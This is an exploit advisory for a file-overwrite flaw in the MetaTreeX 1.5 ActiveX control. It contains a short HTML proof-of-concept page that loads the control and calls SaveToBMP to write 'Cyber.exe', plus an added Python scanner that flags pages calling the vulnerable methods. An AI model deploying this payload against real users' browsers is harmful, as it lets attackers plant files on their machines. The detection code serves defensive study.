MetaTreeX Control 1.5 ActiveX Multiple Arbitrary File Overwrite Exploit
2009-03-16 17:02:41
<HTML>
MetaTreeX Control 1.5 (MTXControl.OCX) Multiple Arbitrary File Overwrite Exploit<br>
<br>
<br>
<br>
<br>
Found By : Cyber-Zone <br>
E-mail : [email protected] <br>
Home : WwW.IQ-TY.CoM ; WwW.No-ExploiT.CoM <br>
Sp Thanx : Hussin X , Jiko (Che7ta4Ever My Best Friend we Are No-Exploit TeaM) , StaCk , ALL Mgharba MoroCCo ...<br>
<br>
<br>
Download Product From : http://dl.filekicker.com/send/file/167724-JVEG/mxsetup.exe <br>
Home : http://www.metaproducts.com/default.asp <br>
Price : $70.00 <br>
<br>
<br>
<br>
<br>
<br>
Description : An arbitrary file overwrite can be exploited on the target system. Tested on SP2 FR, fully patched, with IE 7.<br>
<br>
<br>
Vulnerable functions : Sub SaveToBMP ( ByVal FileName As String , ByVal PixelFormat As TxPixelFormat ) and Sub SaveToFile ( ByVal FileName As String , ByVal Unicode As Boolean ) <br>
<br>
<br>
<!--
Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
-->
<br>
<br>
Exploit 1 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::<br>
<br>
<title>Exploited By : Cyber-Zone </title>
<BODY>
<object id=cyber classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object>
<SCRIPT>
function Do_it()
{
File = "Cyber.exe"
cyber.SaveToBMP(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here Baby :)"><br>
<br>
<br>
Exploit 2 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::<br>
Just change the function in the first example from (SaveToBMP) to (SaveToFile) ;)<br>
</body>
</HTML>
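
A defensive content check for the pattern shown above, as an added example that is not part of the original advisory: it flags HTML that instantiates the control by its CLSID and calls SaveToBMP or SaveToFile on that object. The class and function names and the sample page are constructed for illustration; the CLSID and method names are the ones listed above.

```python
import re
from html.parser import HTMLParser

# CLSID and method names are the ones listed in the advisory above.
CLSID = "67E66985-F81A-11D6-BC0F-F7B40157DC26"
METHODS = {m.lower(): m for m in ("SaveToBMP", "SaveToFile")}
CLSID_RE = re.compile(r"\s*clsid:\s*\{?" + CLSID + r"\}?\s*$", re.I)


class Collector(HTMLParser):
    """Collects ids of <object> tags bound to the CLSID, plus all script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        if tag == "object" and CLSID_RE.match(a.get("classid", "")):
            self.object_ids.append(a.get("id", ""))
        if tag == "script":
            self._in_script = True
        # Inline handlers such as onclick= can call the control directly.
        self.scripts += [v for k, v in a.items() if k.startswith("on")]

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_html(html):
    """Return sorted (object_id, method) pairs for calls to the listed methods."""
    c = Collector()
    c.feed(html)
    c.close()
    script = "\n".join(c.scripts)
    hits = set()
    for oid in filter(None, c.object_ids):
        # Case-insensitive: VBScript names and COM dispatch names ignore case.
        call = re.compile(r"\b%s\s*\.\s*(%s)\s*\(" % (re.escape(oid), "|".join(METHODS)), re.I)
        hits.update((oid, METHODS[m.group(1).lower()]) for m in call.finditer(script))
    return sorted(hits)


# Constructed sample page (not captured traffic); the file name is a placeholder.
SAMPLE = ('<object id=ctl classid="CLSID:%s"></object>'
          '<script>ctl.savetofile("out.txt", false)</script>' % CLSID)
```

The check only matches direct calls on the object's id, so references made through an alias are missed; the CLSID on its own is a broader but noisier indicator.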

